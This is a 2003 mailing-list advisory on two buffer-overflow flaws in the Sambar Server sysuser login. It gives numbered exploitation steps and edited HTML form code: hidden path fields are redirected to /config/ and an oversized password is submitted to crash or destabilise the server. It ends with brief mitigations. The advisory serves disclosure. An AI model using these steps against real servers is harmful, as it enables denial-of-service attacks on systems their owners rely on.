Sambar Server "Buffer OverFlow" Vulnerabilities

From: Lorenzo Hernandez Garcia-Hierro <security(at)lorenzohgh.com>
Date: Mon Mar 31 2003 - 14:30:46 EST

• THE SAMBAR SERVER BUFFER OVERFLOW IN SYSUSER LOGIN SYSTEM *****

RISK ( by mine) : 7 (1/10)
SYSTES AFFECTED: All Sambar Server systems with sysuser login included. VULNERABILITIES: 2 KNOWN ( can be more)
DESCRIPTION: This vulnerability is caused because the form that the Sambar Server demon doesn't examinates the buffer and sizes of the login form transfer, the only protection for the server is the values at the form in the html code ( the max value of the RCPassword input) , this can be a vulnerability if the server is public-exposed and the directories of the sysuser is known.

METHOD TO XPLOIT IT: You must be sure and known the true path (at sambar root like c:\sambar ) of the sysuser login form, now follow this easy steps:

1st: go to the webserver sysuser login form path , like http://localhost/sysuser/index.stm (you must specify the index.stm for the RPC called locally trough index.stm ).

2nd: copy and paste the code of the form ( total page ) and paste it in a blank text field , rename to a something.html .

3th: put in the correct fields the http://localhost or url for your sambar server installation ,this is for the form and images , of course, the form must be connect to the correct url address of the server script. The code goes like here:
[FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return
FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"

VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
[INPUT TYPE=hidden NAME="onfailure"

VALUE="http://localhost/sysuser/relogin.stm"]*you can modify this to more buffer over flow like to a cgi script (this can be a DoS attack
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *This is the problem!*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*This is the problem!*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]

4th: now you can try to refresh and login , use a valid user and password if you want to prove the vulnerability number one or go to the 6th step!

5th: now you must push on the submit button , wait , and if you are running the server on your computer the server pick up and becomes unstable , if you continue sending this attemps the server must be restarted or the computer restarted during the attack!.

6th: the second vulnerability is the bffer overflow in form fields of password ( you can learn more about this in the advisory of Allaire 'ColdFusion Buffer OverFlow in form fields') , you can insert more than million of characters and submit it but you must edit the form code in your computer:
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< change this to...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="here put your text, more than
hundred thousand characters"]
and..........
7th: push on submit and the server pick up too!

SOLUTION: I don't know a completly solutions because this vulnerability is the ancient and older type of vulnerability and the only possible solution is...

• Change the path and directory of the sambar server user files!
• the developers of sambar server can change the code and develop a module for examine the trafic of user files and buffers of form transfer in POST or GET mode.

  ---

CONTACT:
NAME: Lorenzo Hernandez Garcia-Hierro
MAIL: security@lorenzohgh.com
WEBSITE: www.lorenzohgh.com

---

Received on Tue Apr 1 14:33:30 2003